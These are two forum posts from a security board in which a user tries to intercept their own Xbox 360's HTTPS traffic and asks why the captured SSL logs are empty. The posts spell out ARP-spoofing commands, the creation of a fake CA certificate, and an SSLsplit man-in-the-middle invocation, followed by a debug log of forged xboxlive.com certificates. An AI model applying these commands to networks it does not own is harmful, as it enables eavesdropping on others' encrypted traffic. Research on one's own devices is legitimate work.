Jump to content

precursor

Members
 View Profile  See their activity

  • Posts

    2

  • Joined

  • Last visited

 Content Type 

Posts posted by precursor

    Trouble using SSLsplit to sniff Xbox 360 traffic

    in Security

    Posted

    I forgot to post the debug output from sslsplit:

    Generated RSA key for leaf certs.
SSLsplit 0.4.9 (built 2015-03-10)
Copyright (c) 2009-2014, Daniel Roethlisberger <daniel@roe.ch>
http://www.roe.ch/SSLsplit
Build info: V:FILE
Features: -DHAVE_NETFILTER
NAT engines: netfilter* tproxy
netfilter:  IP_TRANSPARENT SOL_IPV6 !IPV6_ORIGINAL_DST
compiled against OpenSSL 1.0.2 22 Jan 2015 (1000200f)
rtlinked against OpenSSL 1.0.2 22 Jan 2015 (1000200f)
TLS Server Name Indication (SNI) supported
OpenSSL is thread-safe with THREADID
Using SSL_MODE_RELEASE_BUFFERS
SSL/TLS algorithm availability: RSA DSA ECDSA DH ECDH EC
OpenSSL option availability: SSL_OP_NO_COMPRESSION SSL_OP_NO_TICKET SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION SSL_OP_TLS_ROLLBACK_BUG
compiled against libevent 2.0.22-stable
rtlinked against libevent 2.0.22-stable
2 CPU cores detected
proxyspecs:
- [0.0.0.0]:8080 tcp plain netfilter
- [0.0.0.0]:8443 ssl plain netfilter
Loaded CA: '/C=US/ST=UT/O=Internet Widgits Pty Ltd/CN=Someone'
Using libevent backend 'epoll'
Event base supports: edge yes, O(1) yes, anyfd no
Inserted events:
  0x12054b0 [fd 7] Read Persist
  0x1208740 [fd 8] Read Persist
  0x12088f0 [fd 9] Read Persist
  0x12052e8 [fd 6] Read Persist
  0x1208980 [fd 3] Signal Persist
  0x1208bc0 [fd 1] Signal Persist
  0x1208cf0 [fd 2] Signal Persist
  0x1208e20 [fd 13] Signal Persist
Initialized 4 connection handling threads
Started 4 connection handling threads
Starting main event loop.
Connecting to [199.117.103.168]:80
tcp [192.168.0.22]:19970 [199.117.103.168]:80
SNI peek: [n/a] [complete]
Connecting to [134.170.178.197]:443
===> Original server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 69:c6:f2:83:ee:0a:16:3b:fd:a6:df:f7:21:c9:97:0a:6d:7d:65:91
Certificate cache: MISS
===> Forged server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 16:64:58:97:e4:90:80:7d:84:77:67:bd:f2:93:c6:f2:ea:d6:68:d4
ssl [192.168.0.22]:5808 [134.170.178.197]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
Garbage collecting caches started.
Garbage collecting caches done.
SNI peek: [n/a] [complete]
Connecting to [134.170.178.64]:443
===> Original server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 69:c6:f2:83:ee:0a:16:3b:fd:a6:df:f7:21:c9:97:0a:6d:7d:65:91
Certificate cache: HIT
===> Forged server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 16:64:58:97:e4:90:80:7d:84:77:67:bd:f2:93:c6:f2:ea:d6:68:d4
ssl [192.168.0.22]:48310 [134.170.178.64]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
SNI peek: [n/a] [complete]
Connecting to [65.55.42.33]:443
SNI peek: [n/a] [complete]
Connecting to [65.55.42.33]:443
SNI peek: [n/a] [complete]
Connecting to [157.56.70.154]:443
===> Original server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb
Certificate cache: MISS
===> Forged server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c
ssl [192.168.0.22]:32910 [65.55.42.33]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
SNI peek: [n/a] [complete]
Attempt reuse dst SSL session
Connecting to [134.170.178.197]:443
===> Original server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb
Certificate cache: HIT
===> Forged server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c
ssl [192.168.0.22]:29356 [65.55.42.33]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
===> Original server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb
Certificate cache: HIT
===> Forged server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c
ssl [192.168.0.22]:28325 [157.56.70.154]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
===> Original server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 69:c6:f2:83:ee:0a:16:3b:fd:a6:df:f7:21:c9:97:0a:6d:7d:65:91
Certificate cache: HIT
===> Forged server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 16:64:58:97:e4:90:80:7d:84:77:67:bd:f2:93:c6:f2:ea:d6:68:d4
ssl [192.168.0.22]:25598 [134.170.178.197]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
SNI peek: [n/a] [complete]
Connecting to [172.230.192.227]:443
SNI peek: [n/a] [complete]
Attempt reuse dst SSL session
Connecting to [65.55.42.33]:443
===> Original server certificate:
Subject DN: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/OU=Xbox/CN=*.xbox.com
Common Names: *.xbox.com/*.xbox.com
Fingerprint: fa:36:ff:8e:70:87:3d:52:3b:65:23:43:65:63:36:5e:4f:24:a6:eb
Certificate cache: MISS
===> Forged server certificate:
Subject DN: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/OU=Xbox/CN=*.xbox.com
Common Names: *.xbox.com/*.xbox.com
Fingerprint: 44:4c:08:75:ea:66:05:74:ff:37:de:d0:15:2e:bb:c2:26:e3:12:76
ssl [192.168.0.22]:10291 [172.230.192.227]:443 sni:- crt:*.xbox.com/*.xbox.com origcrt:*.xbox.com/*.xbox.com
===> Original server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 1d:53:37:af:7a:4d:b6:c9:ff:4d:39:35:f7:bb:06:64:58:54:36:bb
Certificate cache: HIT
===> Forged server certificate:
Subject DN: /CN=*.xboxlive.com
Common Names: *.xboxlive.com
Fingerprint: 4b:fb:b2:96:45:b8:fc:66:32:10:ab:36:21:13:c3:34:4a:5e:52:9c
ssl [192.168.0.22]:57485 [65.55.42.33]:443 sni:- crt:*.xboxlive.com origcrt:*.xboxlive.com
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
Unclean SSL shutdown.
SSL_free() in state 00002190 = SSL_ST_ACCEPT|0190 = 3RCKEA (SSLv3 read client key exchange A) [accept socket]
SSL_free() in state 00000003 = 0003 = SSLOK  (SSL negotiation finished successfully) [connect socket]
Garbage collecting caches started.
Garbage collecting caches done.
^CReceived signal 2
Main event loop stopped.

    Trouble using SSLsplit to sniff Xbox 360 traffic

    in Security

    Posted

    I'm attempting to sniff my Xbox 360's traffic and see the cleartext data sent over HTTPS+SSL.

    My xbox 360's local IP address is: 192.168.0.22.

    My attacker Arch Linux box's address is: 192.168.0.18.

    I have installed dsniff and SSLsplit on attacker box and am performing an ARP cache poisoning attack using the following commands simultaneous in two terminal windows:

    arpspoof -i enp0s25 -t 192.168.0.1 192.168.0.22

    arpspoof -i enp0s25 -t 192.168.0.22 192.168.0.1

    I created a fake certificate using the following commands:

    openssl genrsa -out ca.key 4096
    openssl req -new -x509 -days 1826 -key ca.key -out ca.crt
    I am running sslsplit like this:
    sslsplit -D -l connections.log -j /var/log/sslsplit/ -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
    When I login to XBL on the 360, I see non-SSL traffic over port 80 in the logs, but the SSL traffic over port 443 has log files with nothing in them (size=0KB).
    My guess is there is a problem with my certificate, it's not able to verify that it has been signed by a Root CA. Do you know of a way to fix this issue?
    If that's not the issue, what is and how can I fix it?
    Thanks for your help.
×
×
  • Create New...